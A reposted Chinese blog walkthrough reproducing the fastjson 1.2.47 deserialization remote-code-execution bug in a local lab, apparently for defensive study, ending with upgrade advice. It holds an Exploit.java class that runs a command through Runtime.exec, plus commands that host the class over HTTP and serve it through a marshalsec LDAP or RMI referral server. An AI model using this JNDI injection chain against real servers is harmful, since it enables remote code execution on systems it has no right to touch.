fastjson =< 1.2.47 反序列化漏洞复现

最新推荐文章于 2024-06-19 12:51:52 发布
最新推荐文章于 2024-06-19 12:51:52 发布
阅读量763 收藏
点赞数
文章标签: 运维 测试 ldap
原文链接:http://www.cnblogs.com/zhengjim/p/11433926.html
版权

fastjson =< 1.2.47 反序列化漏洞复现

HW期间爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版)

复现详情

环境

  • win10
  • fastjson 1.2.47
  • jdk 1.8.1
  • marshalsec

环境过程

首先先创建maven项目,下载fastjson版本为1.2.47

<dependencies>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.47</version>
        </dependency>
</dependencies>

创建一个Exploit.java文件,Java 编译一下生成 Exploit.class 文件

exploit.java内容

public class Exploit {

        static {
                System.err.println("Pwned");
                try {
                        String[] cmd = {"calc"};
                        java.lang.Runtime.getRuntime().exec(cmd).waitFor();
                } catch ( Exception e ) {
                        e.printStackTrace();
                }
        }
}

然后启动http服务,这边利用python的SimpleHTTPServer来启动。

python2 -m SimpleHTTPServer

983170-20190830111041693-1752323038.png

再利用marshalsec转发,创建一个ldap服务器

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit"

983170-20190830111111159-1597654907.png

最后编写了一个测试用例

983170-20190830111127459-753073477.png

运行即可触发漏洞。

983170-20190830111141518-1850631252.png

983170-20190830111155598-1805794626.png

修复意见

尽快将fastjson升级至1.2.48及以上的版本。

转载于:https://www.cnblogs.com/zhengjim/p/11433926.html

weixin_30430169
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3367
Fastjson 1.2.47反序列化漏洞复现
Fastjson<=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 921
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson复现利用
qq_43660551的博客
08-16 1527
进入target下,启动rmi服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104:8080/#TouchFile" 2222。上传恶意文件到公网,在本机打开命令行,进入存放java文件的目录,javac TouchFile.java编译刚才的java文件,编译完成在当前目录下发现class文件已经存在:TouchFile.class。至此,攻击环境准备好了。.....
Fastjson 反序列化漏洞(CVE-2017-18349)
最新发布
qq_68163788的博客
06-19 947
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 724
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
Java代码审计17之fastjson反序列化漏洞(2)
划水的小白白
09-25 582
1、类加载与反射调用 1.1、类加载 1.2测试代码 1.3、通过类的加载和反射调用evil类 2、Fastjson TemplatesImpl链调试 2.1、链路总览 2.2、调试构造利用链 3、fastjson反序列化TemplatesImpl 利⽤ 3.1、开启 Feature.SupportNonPublicField 得作用 3.2、构造利用payload 3.3、模拟实际环境
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2197
Fastjson反序列化漏洞复现
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img]...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 430
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
Fastjson反序列化漏洞原理与复现
FisrtBqy的博客
05-15 3357
Ffasjson反序列化漏洞原理与复现
FastJson使用和依赖
weixin_44939749的博客
03-17 8576
在main方法中,我们创建了一个User对象,并使用FastJson将它转换为JSON格式的字符串,然后输出这个字符串。FastJson是阿里巴巴提供的JSON框架,可以将Java对象转换为JSON格式的字符串,也可以将JSON格式的字符串转换为Java对象。可以看到,使用FastJsonJava对象转换为JSON字符串非常简单,只需要调用JSON类的toJSONString方法即可。通过添加FastJson的依赖,我们就可以在Java类中使用FastJsonJava对象转换为JSON格式的字符串。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2422
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化Java Bean。
fastjson报错:write javaBean error, fastjson version 1.2.76, class io.undertow.servlet.xx,已解决
热门推荐
chengjiayijiu的博客
09-01 1万+
小白一枚,开发项目过程中测试了下导出文件功能,发现了一个bug,控制台输出报错信息,结果是正确的,但是bug报在控制台真的不好看啊。弄了一天半,一路debug删删减减到service方法都注释掉了,controller方法里就是空的,postman发送请求还是报错同样的信息。网上也搜不到这个bug,就很离谱,因为报fastjson错误,所以到git上fastjson也搜索关键词,还是没有。 错误信息: com.alibaba.fastjson.JSONException: write javaBean
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1289
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
fastjson反序列化漏洞复现过程
04-19
- Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值